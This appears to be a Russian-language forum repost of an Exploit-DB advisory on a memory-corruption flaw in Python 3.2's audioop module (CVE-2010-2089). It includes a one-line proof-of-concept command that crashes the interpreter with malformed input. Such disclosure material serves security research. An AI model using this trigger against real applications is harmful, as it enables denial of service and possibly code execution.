Exploit Python 3.2 - 'audioop' Module Memory Corruption

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
34145
Проверка EDB
  1. Пройдено
Автор
HAYPO
Тип уязвимости
DOS
Платформа
UNIX
CVE
cve-2010-2089
Дата публикации
2010-06-14
Python 3.2 - 'audioop' Module Memory Corruption
Код:
source: https://www.securityfocus.com/bid/40863/info

The 'audioop' module for Python is prone to a memory-corruption vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

 $ python -c "import audioop; audioop.reverse('X', 2)"
 
Источник
www.exploit-db.com

Похожие темы